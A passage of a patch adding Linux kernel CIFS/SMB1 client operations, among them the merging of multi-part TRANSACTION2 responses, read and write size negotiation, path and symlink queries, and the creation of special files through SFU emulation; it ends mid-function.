++}
++
++static int
++coalesce_t2(char *second_buf, struct smb_hdr *target_hdr)
++{
++	struct smb_t2_rsp *pSMBs = (struct smb_t2_rsp *)second_buf;
++	struct smb_t2_rsp *pSMBt  = (struct smb_t2_rsp *)target_hdr;
++	char *data_area_of_tgt;
++	char *data_area_of_src;
++	int remaining;
++	unsigned int byte_count, total_in_tgt;
++	__u16 tgt_total_cnt, src_total_cnt, total_in_src;
++
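++	/*
++	 * Rough sketch of the merge done below: the target (first) response
++	 * already holds total_in_tgt bytes of the TotalDataCount the server
++	 * promised; each secondary response's data area is appended at the
++	 * end of the target's data area, and DataCount, BCC and the RFC1001
++	 * length are fixed up to cover the combined payload:
++	 *
++	 *   target: [smb hdr][t2 parms][data .. total_in_tgt][src data ->]
++	 */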
++	src_total_cnt = get_unaligned_le16(&pSMBs->t2_rsp.TotalDataCount);
++	tgt_total_cnt = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
++
++	if (tgt_total_cnt != src_total_cnt)
++		cifs_dbg(FYI, "total data count of primary and secondary t2 differ source=%hu target=%hu\n",
++			 src_total_cnt, tgt_total_cnt);
++
++	total_in_tgt = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
++
++	remaining = tgt_total_cnt - total_in_tgt;
++
++	if (remaining < 0) {
++		cifs_dbg(FYI, "Server sent too much data. tgt_total_cnt=%hu total_in_tgt=%u\n",
++			 tgt_total_cnt, total_in_tgt);
++		return -EPROTO;
++	}
++
++	if (remaining == 0) {
++		/* nothing to do, ignore */
++		cifs_dbg(FYI, "no more data remains\n");
++		return 0;
++	}
++
++	total_in_src = get_unaligned_le16(&pSMBs->t2_rsp.DataCount);
++	if (remaining < total_in_src)
++		cifs_dbg(FYI, "transact2 2nd response contains too much data\n");
++
++	/* find end of first SMB data area */
++	data_area_of_tgt = (char *)&pSMBt->hdr.Protocol +
++				get_unaligned_le16(&pSMBt->t2_rsp.DataOffset);
++
++	/* validate target area */
++	data_area_of_src = (char *)&pSMBs->hdr.Protocol +
++				get_unaligned_le16(&pSMBs->t2_rsp.DataOffset);
++
++	data_area_of_tgt += total_in_tgt;
++
++	total_in_tgt += total_in_src;
++	/* is the result too big for the field? */
++	if (total_in_tgt > USHRT_MAX) {
++		cifs_dbg(FYI, "coalesced DataCount too large (%u)\n",
++			 total_in_tgt);
++		return -EPROTO;
++	}
++	put_unaligned_le16(total_in_tgt, &pSMBt->t2_rsp.DataCount);
++
++	/* fix up the BCC */
++	byte_count = get_bcc(target_hdr);
++	byte_count += total_in_src;
++	/* is the result too big for the field? */
++	if (byte_count > USHRT_MAX) {
++		cifs_dbg(FYI, "coalesced BCC too large (%u)\n", byte_count);
++		return -EPROTO;
++	}
++	put_bcc(byte_count, target_hdr);
++
++	byte_count = be32_to_cpu(target_hdr->smb_buf_length);
++	byte_count += total_in_src;
++	/* don't allow buffer to overflow */
++	if (byte_count > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
++		cifs_dbg(FYI, "coalesced BCC exceeds buffer size (%u)\n",
++			 byte_count);
++		return -ENOBUFS;
++	}
++	target_hdr->smb_buf_length = cpu_to_be32(byte_count);
++
++	/* copy second buffer into end of first buffer */
++	memcpy(data_area_of_tgt, data_area_of_src, total_in_src);
++
++	if (remaining != total_in_src) {
++		/* more responses to go */
++		cifs_dbg(FYI, "waiting for more secondary responses\n");
++		return 1;
++	}
++
++	/* we are done */
++	cifs_dbg(FYI, "found the last secondary response\n");
++	return 0;
++}
++
++static void
++cifs_downgrade_oplock(struct TCP_Server_Info *server,
++		      struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	cifs_set_oplock_level(cinode, oplock);
++}
++
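++/*
++ * Decide whether this buffer is part of a multi-part TRANSACTION2
++ * response and, if so, fold it into the response already held by the
++ * mid via coalesce_t2(), dequeueing the mid once all parts (or a
++ * malformed part) have arrived. Returns false when the buffer is not
++ * a continuation of a multi-part response and normal dispatch should
++ * proceed.
++ */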
++static bool
++cifs_check_trans2(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++		  char *buf, int malformed)
++{
++	if (malformed)
++		return false;
++	if (check2ndT2(buf) <= 0)
++		return false;
++	mid->multiRsp = true;
++	if (mid->resp_buf) {
++		/* merge response - fix up 1st */
++		malformed = coalesce_t2(buf, mid->resp_buf);
++		if (malformed > 0)
++			return true;
++		/* All parts received or packet is malformed. */
++		mid->multiEnd = true;
++		dequeue_mid(mid, malformed);
++		return true;
++	}
++	if (!server->large_buf) {
++		/* FIXME: switch to already allocated largebuf? */
++		cifs_dbg(VFS, "1st trans2 resp needs bigbuf\n");
++	} else {
++		/* Have first buffer */
++		mid->resp_buf = buf;
++		mid->large_buf = true;
++		server->bigbuf = NULL;
++	}
++	return true;
++}
++
++static bool
++cifs_need_neg(struct TCP_Server_Info *server)
++{
++	return server->maxBuf == 0;
++}
++
++static int
++cifs_negotiate(const unsigned int xid,
++	       struct cifs_ses *ses,
++	       struct TCP_Server_Info *server)
++{
++	int rc;
++	rc = CIFSSMBNegotiate(xid, ses, server);
++	if (rc == -EAGAIN) {
++		/* retry only once on 1st time connection */
++		set_credits(server, 1);
++		rc = CIFSSMBNegotiate(xid, ses, server);
++		if (rc == -EAGAIN)
++			rc = -EHOSTDOWN;
++	}
++	return rc;
++}
++
++static unsigned int
++cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int wsize;
++
++	/* start with specified wsize, or default */
++	if (ctx->wsize)
++		wsize = ctx->wsize;
++	else if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
++		wsize = CIFS_DEFAULT_IOSIZE;
++	else
++		wsize = CIFS_DEFAULT_NON_POSIX_WSIZE;
++
++	/* can server support 24-bit write sizes? (via UNIX extensions) */
++	if (!tcon->unix_ext || !(unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
++		wsize = min_t(unsigned int, wsize, CIFS_MAX_RFC1002_WSIZE);
++
++	/*
++	 * No CAP_LARGE_WRITE_X, or signing enabled without CAP_UNIX?
++	 * Limit writes to the max buffer offered by the server, minus the
++	 * size of the WRITEX header, not including the 4 byte RFC1001 length.
++	 */
++	if (!(server->capabilities & CAP_LARGE_WRITE_X) ||
++	    (!(server->capabilities & CAP_UNIX) && server->sign))
++		wsize = min_t(unsigned int, wsize,
++				server->maxBuf - sizeof(WRITE_REQ) + 4);
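++	/*
++	 * Illustrative (hypothetical) numbers: a signing-enforcing server
++	 * without CAP_UNIX that advertises maxBuf = 16644 is clamped to
++	 * 16644 - sizeof(WRITE_REQ) + 4 bytes per write here, well below
++	 * the CIFS_MAX_WSIZE hard limit applied next.
++	 */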
++
++	/* hard limit of CIFS_MAX_WSIZE */
++	wsize = min_t(unsigned int, wsize, CIFS_MAX_WSIZE);
++
++	return wsize;
++}
++
++static unsigned int
++cifs_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int rsize, defsize;
++
++	/*
++	 * Set default value...
++	 *
++	 * HACK alert! Ancient servers have very small buffers. Even though
++	 * MS-CIFS indicates that servers are only limited by the client's
++	 * bufsize for reads, testing against win98se shows that it throws
++	 * INVALID_PARAMETER errors if you try to request too large a read.
++	 * OS/2 just sends back short reads.
++	 *
++	 * If the server doesn't advertise CAP_LARGE_READ_X, then assume that
++	 * it can't handle a read request larger than its MaxBufferSize either.
++	 */
++	if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_READ_CAP))
++		defsize = CIFS_DEFAULT_IOSIZE;
++	else if (server->capabilities & CAP_LARGE_READ_X)
++		defsize = CIFS_DEFAULT_NON_POSIX_RSIZE;
++	else
++		defsize = server->maxBuf - sizeof(READ_RSP);
++
++	rsize = ctx->rsize ? ctx->rsize : defsize;
++
++	/*
++	 * no CAP_LARGE_READ_X? Then MS-CIFS states that we must limit this to
++	 * the client's MaxBufferSize.
++	 */
++	if (!(server->capabilities & CAP_LARGE_READ_X))
++		rsize = min_t(unsigned int, CIFSMaxBufSize, rsize);
++
++	/* hard limit of CIFS_MAX_RSIZE */
++	rsize = min_t(unsigned int, rsize, CIFS_MAX_RSIZE);
++
++	return rsize;
++}
++
++static void
++cifs_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct cifs_sb_info *cifs_sb)
++{
++	CIFSSMBQFSDeviceInfo(xid, tcon);
++	CIFSSMBQFSAttributeInfo(xid, tcon);
++}
++
++static int
++cifs_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
++			struct cifs_sb_info *cifs_sb, const char *full_path)
++{
++	int rc;
++	FILE_ALL_INFO *file_info;
++
++	file_info = kmalloc(sizeof(FILE_ALL_INFO), GFP_KERNEL);
++	if (file_info == NULL)
++		return -ENOMEM;
++
++	rc = CIFSSMBQPathInfo(xid, tcon, full_path, file_info,
++			      0 /* not legacy */, cifs_sb->local_nls,
++			      cifs_remap(cifs_sb));
++
++	if (rc == -EOPNOTSUPP || rc == -EINVAL)
++		rc = SMBQueryInformation(xid, tcon, full_path, file_info,
++				cifs_sb->local_nls, cifs_remap(cifs_sb));
++	kfree(file_info);
++	return rc;
++}
++
++static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb, const char *full_path,
++				struct cifs_open_info_data *data, bool *adjustTZ, bool *symlink)
++{
++	int rc;
++	FILE_ALL_INFO fi = {};
++
++	*symlink = false;
++
++	/* could do find first instead but this returns more info */
++	rc = CIFSSMBQPathInfo(xid, tcon, full_path, &fi, 0 /* not legacy */, cifs_sb->local_nls,
++			      cifs_remap(cifs_sb));
++	/*
++	 * BB optimize code so we do not make the above call when server claims
++	 * no NT SMB support and the above call failed at least once - set flag
++	 * in tcon or mount.
++	 */
++	if ((rc == -EOPNOTSUPP) || (rc == -EINVAL)) {
++		rc = SMBQueryInformation(xid, tcon, full_path, &fi, cifs_sb->local_nls,
++					 cifs_remap(cifs_sb));
++		*adjustTZ = true;
++	}
++
++	if (!rc) {
++		int tmprc;
++		int oplock = 0;
++		struct cifs_fid fid;
++		struct cifs_open_parms oparms;
++
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
++			return 0;
++
++		oparms = (struct cifs_open_parms) {
++			.tcon = tcon,
++			.cifs_sb = cifs_sb,
++			.desired_access = FILE_READ_ATTRIBUTES,
++			.create_options = cifs_create_options(cifs_sb, 0),
++			.disposition = FILE_OPEN,
++			.path = full_path,
++			.fid = &fid,
++		};
++
++		/* Need to check if this is a symbolic link or not */
++		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
++		if (tmprc == -EOPNOTSUPP)
++			*symlink = true;
++		else if (tmprc == 0)
++			CIFSSMBClose(xid, tcon, fid.netfid);
++	}
++
++	return rc;
++}
++
++static int cifs_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
++			     struct cifs_sb_info *cifs_sb, const char *full_path,
++			     u64 *uniqueid, struct cifs_open_info_data *unused)
++{
++	/*
++	 * We cannot use the IndexNumber field by default from Windows or
++	 * Samba (in ALL_INFO buf) but we can request it explicitly. The SNIA
++	 * CIFS spec claims that this value is unique within the scope of a
++	 * share, and the Windows docs hint that it's actually unique
++	 * per-machine.
++	 *
++	 * There may be higher info levels that work, but are there Windows
++	 * servers or network appliances for which the IndexNumber field is
++	 * not guaranteed unique?
++	 */
++	return CIFSGetSrvInodeNumber(xid, tcon, full_path, uniqueid,
++				     cifs_sb->local_nls,
++				     cifs_remap(cifs_sb));
++}
++
++static int cifs_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
++{
++	int rc;
++	FILE_ALL_INFO fi = {};
++
++	if (cfile->symlink_target) {
++		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++		if (!data->symlink_target)
++			return -ENOMEM;
++	}
++
++	rc = CIFSSMBQFileInfo(xid, tcon, cfile->fid.netfid, &fi);
++	if (!rc)
++		move_cifs_info_to_smb2(&data->fi, &fi);
++	return rc;
++}
++
++static void
++cifs_clear_stats(struct cifs_tcon *tcon)
++{
++	atomic_set(&tcon->stats.cifs_stats.num_writes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_reads, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_flushes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_oplock_brks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_opens, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_posixopens, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_posixmkdirs, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_closes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_deletes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_mkdirs, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_rmdirs, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_renames, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_t2renames, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_ffirst, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_fnext, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_fclose, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_hardlinks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_symlinks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_locks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_acl_get, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_acl_set, 0);
++}
++
++static void
++cifs_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	seq_printf(m, " Oplock breaks: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_oplock_brks));
++	seq_printf(m, "\nReads:  %d Bytes: %llu",
++		   atomic_read(&tcon->stats.cifs_stats.num_reads),
++		   (long long)(tcon->bytes_read));
++	seq_printf(m, "\nWrites: %d Bytes: %llu",
++		   atomic_read(&tcon->stats.cifs_stats.num_writes),
++		   (long long)(tcon->bytes_written));
++	seq_printf(m, "\nFlushes: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_flushes));
++	seq_printf(m, "\nLocks: %d HardLinks: %d Symlinks: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_locks),
++		   atomic_read(&tcon->stats.cifs_stats.num_hardlinks),
++		   atomic_read(&tcon->stats.cifs_stats.num_symlinks));
++	seq_printf(m, "\nOpens: %d Closes: %d Deletes: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_opens),
++		   atomic_read(&tcon->stats.cifs_stats.num_closes),
++		   atomic_read(&tcon->stats.cifs_stats.num_deletes));
++	seq_printf(m, "\nPosix Opens: %d Posix Mkdirs: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_posixopens),
++		   atomic_read(&tcon->stats.cifs_stats.num_posixmkdirs));
++	seq_printf(m, "\nMkdirs: %d Rmdirs: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_mkdirs),
++		   atomic_read(&tcon->stats.cifs_stats.num_rmdirs));
++	seq_printf(m, "\nRenames: %d T2 Renames %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_renames),
++		   atomic_read(&tcon->stats.cifs_stats.num_t2renames));
++	seq_printf(m, "\nFindFirst: %d FNext %d FClose %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_ffirst),
++		   atomic_read(&tcon->stats.cifs_stats.num_fnext),
++		   atomic_read(&tcon->stats.cifs_stats.num_fclose));
++}
++
++static void
++cifs_mkdir_setinfo(struct inode *inode, const char *full_path,
++		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
++		   const unsigned int xid)
++{
++	FILE_BASIC_INFO info;
++	struct cifsInodeInfo *cifsInode;
++	u32 dosattrs;
++	int rc;
++
++	memset(&info, 0, sizeof(info));
++	cifsInode = CIFS_I(inode);
++	dosattrs = cifsInode->cifsAttrs|ATTR_READONLY;
++	info.Attributes = cpu_to_le32(dosattrs);
++	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, &info, cifs_sb->local_nls,
++				cifs_sb);
++	if (rc == 0)
++		cifsInode->cifsAttrs = dosattrs;
++}
++
++static int cifs_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
++			  void *buf)
++{
++	struct cifs_open_info_data *data = buf;
++	FILE_ALL_INFO fi = {};
++	int rc;
++
++	if (!(oparms->tcon->ses->capabilities & CAP_NT_SMBS))
++		rc = SMBLegacyOpen(xid, oparms->tcon, oparms->path,
++				   oparms->disposition,
++				   oparms->desired_access,
++				   oparms->create_options,
++				   &oparms->fid->netfid, oplock, &fi,
++				   oparms->cifs_sb->local_nls,
++				   cifs_remap(oparms->cifs_sb));
++	else
++		rc = CIFS_open(xid, oparms, oplock, &fi);
++
++	if (!rc && data)
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++	return rc;
++}
++
++static void
++cifs_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	cfile->fid.netfid = fid->netfid;
++	cifs_set_oplock_level(cinode, oplock);
++	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
++}
++
++static void
++cifs_close_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	CIFSSMBClose(xid, tcon, fid->netfid);
++}
++
++static int
++cifs_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	return CIFSSMBFlush(xid, tcon, fid->netfid);
++}
++
++static int
++cifs_sync_read(const unsigned int xid, struct cifs_fid *pfid,
++	       struct cifs_io_parms *parms, unsigned int *bytes_read,
++	       char **buf, int *buf_type)
++{
++	parms->netfid = pfid->netfid;
++	return CIFSSMBRead(xid, parms, bytes_read, buf, buf_type);
++}
++
++static int
++cifs_sync_write(const unsigned int xid, struct cifs_fid *pfid,
++		struct cifs_io_parms *parms, unsigned int *written,
++		struct kvec *iov, unsigned long nr_segs)
++{
++	parms->netfid = pfid->netfid;
++	return CIFSSMBWrite2(xid, parms, written, iov, nr_segs);
++}
++
++static int
++smb_set_file_info(struct inode *inode, const char *full_path,
++		  FILE_BASIC_INFO *buf, const unsigned int xid)
++{
++	int oplock = 0;
++	int rc;
++	__u32 netpid;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifsFileInfo *open_file;
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon;
++
++	/* if the file is already open for write, just use that fileid */
++	open_file = find_writable_file(cinode, FIND_WR_FSUID_ONLY);
++	if (open_file) {
++		fid.netfid = open_file->fid.netfid;
++		netpid = open_file->pid;
++		tcon = tlink_tcon(open_file->tlink);
++		goto set_via_filehandle;
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		tlink = NULL;
++		goto out;
++	}
++	tcon = tlink_tcon(tlink);
++
++	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, buf, cifs_sb->local_nls,
++				cifs_sb);
++	if (rc == 0) {
++		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
++		goto out;
++	} else if (rc != -EOPNOTSUPP && rc != -EINVAL) {
++		goto out;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc != 0) {
++		if (rc == -EIO)
++			rc = -EINVAL;
++		goto out;
++	}
++
++	netpid = current->tgid;
++
++set_via_filehandle:
++	rc = CIFSSMBSetFileInfo(xid, tcon, buf, fid.netfid, netpid);
++	if (!rc)
++		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
++
++	if (open_file == NULL)
++		CIFSSMBClose(xid, tcon, fid.netfid);
++	else
++		cifsFileInfo_put(open_file);
++out:
++	if (tlink != NULL)
++		cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int
++cifs_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	return CIFSSMB_set_compression(xid, tcon, cfile->fid.netfid);
++}
++
++static int
++cifs_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *path, struct cifs_sb_info *cifs_sb,
++		     struct cifs_fid *fid, __u16 search_flags,
++		     struct cifs_search_info *srch_inf)
++{
++	int rc;
++
++	rc = CIFSFindFirst(xid, tcon, path, cifs_sb,
++			   &fid->netfid, search_flags, srch_inf, true);
++	if (rc)
++		cifs_dbg(FYI, "find first failed=%d\n", rc);
++	return rc;
++}
++
++static int
++cifs_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
++		    struct cifs_fid *fid, __u16 search_flags,
++		    struct cifs_search_info *srch_inf)
++{
++	return CIFSFindNext(xid, tcon, fid->netfid, search_flags, srch_inf);
++}
++
++static int
++cifs_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct cifs_fid *fid)
++{
++	return CIFSFindClose(xid, tcon, fid->netfid);
++}
++
++static int
++cifs_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
++{
++	return CIFSSMBLock(0, tcon, net_fid, current->tgid, 0, 0, 0, 0,
++			   LOCKING_ANDX_OPLOCK_RELEASE, false, CIFS_CACHE_READ(cinode) ? 1 : 0);
++}
++
++static int
++cifs_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
++	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
++{
++	int rc = -EOPNOTSUPP;
++
++	buf->f_type = CIFS_SUPER_MAGIC;
++
++	/*
++	 * We could add a second check for a QFS Unix capability bit
++	 */
++	if ((tcon->ses->capabilities & CAP_UNIX) &&
++	    (CIFS_POSIX_EXTENSIONS & le64_to_cpu(tcon->fsUnixInfo.Capability)))
++		rc = CIFSSMBQFSPosixInfo(xid, tcon, buf);
++
++	/*
++	 * Only need to call the old QFSInfo if the newer one failed,
++	 * e.g. on OS/2.
++	 */
++	if (rc && (tcon->ses->capabilities & CAP_NT_SMBS))
++		rc = CIFSSMBQFSInfo(xid, tcon, buf);
++
++	/*
++	 * Some old Windows servers also do not support level 103, so retry
++	 * with the older level if the server failed the previous call or we
++	 * bypassed it because we detected an older LANMAN session.
++	 */
++	if (rc)
++		rc = SMBOldQFSInfo(xid, tcon, buf);
++	return rc;
++}
++
++static int
++cifs_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
++	       __u64 length, __u32 type, int lock, int unlock, bool wait)
++{
++	return CIFSSMBLock(xid, tlink_tcon(cfile->tlink), cfile->fid.netfid,
++			   current->tgid, length, offset, unlock, lock,
++			   (__u8)type, wait, 0);
++}
++
++static int
++cifs_unix_dfs_readlink(const unsigned int xid, struct cifs_tcon *tcon,
++		       const unsigned char *searchName, char **symlinkinfo,
++		       const struct nls_table *nls_codepage)
++{
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	int rc;
++	struct dfs_info3_param referral = {0};
++
++	rc = get_dfs_path(xid, tcon->ses, searchName, nls_codepage, &referral,
++			  0);
++
++	if (!rc) {
++		*symlinkinfo = kstrdup(referral.node_name, GFP_KERNEL);
++		free_dfs_info_param(&referral);
++		if (!*symlinkinfo)
++			rc = -ENOMEM;
++	}
++	return rc;
++#else /* No DFS support */
++	return -EREMOTE;
++#endif
++}
++
++static int
++cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifs_sb_info *cifs_sb, const char *full_path,
++		   char **target_path, bool is_reparse_point)
++{
++	int rc;
++	int oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
++
++	if (is_reparse_point) {
++		cifs_dbg(VFS, "reparse points not handled for SMB1 symlinks\n");
++		return -EOPNOTSUPP;
++	}
++
++	/* Check for unix extensions */
++	if (cap_unix(tcon->ses)) {
++		rc = CIFSSMBUnixQuerySymLink(xid, tcon, full_path, target_path,
++					     cifs_sb->local_nls,
++					     cifs_remap(cifs_sb));
++		if (rc == -EREMOTE)
++			rc = cifs_unix_dfs_readlink(xid, tcon, full_path,
++						    target_path,
++						    cifs_sb->local_nls);
++
++		goto out;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb,
++						      OPEN_REPARSE_POINT),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc)
++		goto out;
++
++	rc = CIFSSMBQuerySymLink(xid, tcon, fid.netfid, target_path,
++				 cifs_sb->local_nls);
++	if (rc)
++		goto out_close;
++
++	convert_delimiter(*target_path, '/');
++out_close:
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	if (!rc)
++		cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
++	return rc;
++}
++
++static bool
++cifs_is_read_op(__u32 oplock)
++{
++	return oplock == OPLOCK_READ;
++}
++
++static unsigned int
++cifs_wp_retry_size(struct inode *inode)
++{
++	return CIFS_SB(inode->i_sb)->ctx->wsize;
++}
++
++static bool
++cifs_dir_needs_close(struct cifsFileInfo *cfile)
++{
++	return !cfile->srch_inf.endOfSearch && !cfile->invalidHandle;
++}
++
++static bool
++cifs_can_echo(struct TCP_Server_Info *server)
++{
++	if (server->tcpStatus == CifsGood)
++		return true;
++
++	return false;
++}
++
++static int
++cifs_make_node(unsigned int xid, struct inode *inode,
++	       struct dentry *dentry, struct cifs_tcon *tcon,
++	       const char *full_path, umode_t mode, dev_t dev)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct inode *newinode = NULL;
++	int rc = -EPERM;
++	struct cifs_open_info_data buf = {};
++	struct cifs_io_parms io_parms;
++	__u32 oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	unsigned int bytes_written;
++	struct win_dev *pdev;
++	struct kvec iov[2];
++
++	if (tcon->unix_ext) {
++		/*
++		 * SMB1 Unix Extensions: requires server support but
++		 * works with all special files
++		 */
++		struct cifs_unix_set_info_args args = {
++			.mode	= mode & ~current_umask(),
++			.ctime	= NO_CHANGE_64,
++			.atime	= NO_CHANGE_64,
++			.mtime	= NO_CHANGE_64,
++			.device	= dev,
++		};
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			args.uid = current_fsuid();
++			args.gid = current_fsgid();
++		} else {
++			args.uid = INVALID_UID; /* no change */
++			args.gid = INVALID_GID; /* no change */
++		}
++		rc = CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
++					    cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++		if (rc)
++			return rc;
++
++		rc = cifs_get_inode_info_unix(&newinode, full_path,
++					      inode->i_sb, xid);
++
++		if (rc == 0)
++			d_instantiate(dentry, newinode);
++		return rc;
++	}
++
++	/*
++	 * SMB1 SFU emulation: should work with all servers, but only
++	 * supports block and char devices (no sockets or fifos)
++	 */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
++		return rc;
++
++	if (!S_ISCHR(mode) && !S_ISBLK(mode))
++		return rc;
++
++	cifs_dbg(FYI, "sfu compat create special file\n");
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
++	if (rc)
++		return rc;
++
++	/*
++	 * BB Do not bother to decode buf since no local inode yet to put
++	 * timestamps in, but we can reuse it safely.
++	 */
++
++	pdev = (struct win_dev *)&buf.fi;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = sizeof(struct win_dev);
++	iov[1].iov_base = &buf.fi;
++	iov[1].iov_len = sizeof(struct win_dev);
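++	/*
++	 * SFU represents a device node as a small regular file whose first
++	 * bytes are an 8-byte tag ("IntxCHR" or "IntxBLK") followed by the
++	 * little-endian 64-bit major and minor numbers written below.
++	 */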
++	if (S_ISCHR(mode)) {
++		memcpy(pdev->type, "IntxCHR", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
